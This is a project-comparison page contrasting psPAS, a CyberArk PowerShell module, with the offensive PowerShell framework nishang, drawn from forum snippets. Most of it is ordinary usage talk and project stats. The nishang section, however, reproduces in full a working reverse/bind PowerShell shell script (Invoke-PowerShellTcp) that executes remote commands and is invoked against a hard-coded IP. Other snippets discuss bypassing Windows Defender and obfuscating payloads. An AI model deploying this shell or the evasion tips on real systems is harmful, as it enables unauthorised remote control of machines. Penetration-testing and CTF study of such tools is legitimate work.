psPAS
nishang
psPAS | nishang | |
---|---|---|
26 | 15 | |
276 | 8,347 | |
- | - | |
7.5 | 0.0 | |
5 days ago | 9 days ago | |
PowerShell | PowerShell | |
MIT License | GNU General Public License v3.0 or later |
Stars - the number of stars that a project has on GitHub. Growth - month over month growth in stars.
Activity is a relative number indicating how actively a project is being developed. Recent commits have higher weight than older ones.
For example, an activity of 9.0 indicates that a project is amongst the top 10% of the most actively developed projects that we are tracking.
psPAS
- PSM for SSH MFA Caching client?
-
Adding safe members to different safe
Or use pspete for simpler scripting; https://pspas.pspete.dev/
-
How to do automation using Powershell and Python?
For PowerShell take a look at https://github.com/cyberark/epv-api-scripts and https://github.com/pspete/psPAS
-
Bulk account renaming
Hi Op, I would use this tool https://github.com/pspete/psPAS it's a module for powershell that will allow you to do what you want. I use the raw API a lot so any questions let me know.
- Pcloud authent issues (API / PsPAS)
-
CyberArk: Help with psPAS 'New-PASSession'
I don't know the module or anything to use it on, however it does have a GitHub page so you might raise an issue there.
-
Help with psPAS 'New-PASSession' command
Our CyberArk team said they just enabled Windows user authentication for my CyberArk app. I would like to authenticate using this method with the psPAS PowerShell module. I'm guessing I need to do this with New-PASSession. The below example is my best attempt at doing this. I think I'm pretty close... however, I think I'm still missing something.
- A little help with psPAS module for CyberArk
-
Invoke-PASCPMOPERATION -ReconcileTask does not work... After running the account is not set for Reconcile using psPAS module. Any suggestions? I have tried giving the -accountid too
This is a community developed project and u/pspete is great at tackling Issues that are submitted on the project at https://github.com/pspete/psPAS. I’d recommend submitting an Issue there and provide as much info as possible and he can try to replicate your issue.
-
Wanted to move bulk account from old safe to new safe via PUU but I don't want to change the password... I don't want to put it as no_value.. Any suggestions?
Also see https://github.com/pspete/psPAS/issues/14 for a related discussion/issue.
nishang
- PowerShell evasion
-
Bypassing Windows Defender (10 Ways)
function Invoke-PowerShellTcp { <# .SYNOPSIS Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. .DESCRIPTION This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port. The script is derived from Powerfun written by Ben Turner & Dave Hardy .PARAMETER IPAddress The IP address to connect to when using the -Reverse switch. .PARAMETER Port The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLE PS > Invoke-PowerShellTcp -Bind -Port 4444 Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be listening on the given IP and port. .LINK http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html https://github.com/nettitude/powershell/blob/master/powerfun.ps1 https://github.com/samratashok/nishang #> [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) try { #Connect back if the reverse switch is used. if ($Reverse) { $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) } #Bind to the provided port if Bind switch is used. if ($Bind) { $listener = [System.Net.Sockets.TcpListener]$Port $listener.start() $client = $listener.AcceptTcpClient() } $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} #Send back current username and computername $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") $stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') $stream.Write($sendbytes,0,$sendbytes.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString($bytes,0, $i) try { #Execute the command on the target. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) } catch { Write-Warning "Something went wrong with execution of command on the target." Write-Error $_ } $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' $x = ($error[0] | Out-String) $error.clear() $sendback2 = $sendback2 + $x #Return the results $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() if ($listener) { $listener.Stop() } } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } } Invoke-PowerShellTcp -Reverse -IPAddress 172.31.17.142 -Port 80
- Powershell scripts suggestions!
-
TryHackMe Flatline Walkthrough
Save this file https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
-
Discrepancies in detecting obfuscated payloads by Windows Defender?
After that I expanded my research and tried a payload from GitHub user samratashok and followed this Guide in which only the text encoding method is altered from ASCII to UTF8. And guess what? It actually worked, Windows Defender does not detect it!
- Using Nishang with Pastebin | Help
- Ideas on how to in-line inspect base64 for malicious code?
- Nishang - PowerShell ofensivo para #redteam, las pruebas de penetración y la seguridad ofensiva 💯
-
Writeup: HackTheBox Bounty - Without Metasploit (OSCP Prep)
I am going to copy/paste the following nishang Reverse Shell in the newly created file link.
- Why is this reverse shell not working?
What are some alternatives?
PoShPACLI - Powershell Module for CyberArk PACLI
powershell-universal - PowerShell Universal is the ultimate platform for building web-based IT tools.
CredentialRetriever - Retrieve Credentials from CyberArk Central Credential Provider Web Service, or Local Credential Provider using CLIPasswordSDK
AdminToolbox - Repository for the AdminToolbox PowerShell Modules
ImportExcel - PowerShell module to import/export Excel spreadsheets, without Excel
ConPtyShell - ConPtyShell - Fully Interactive Reverse Shell for Windows
Edit-CyberArkPlatforms - Cmdlets used to edit CyberArk platforms
universal-dashboard - Build beautiful websites with PowerShell.
PoShKeePass - PowerShell module for KeePass
PoshC2 - A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
CyberArkDashboard
ChangelogManagement - A PowerShell module for reading and manipulating changelog files in Keep a Changelog 1.0.0 format.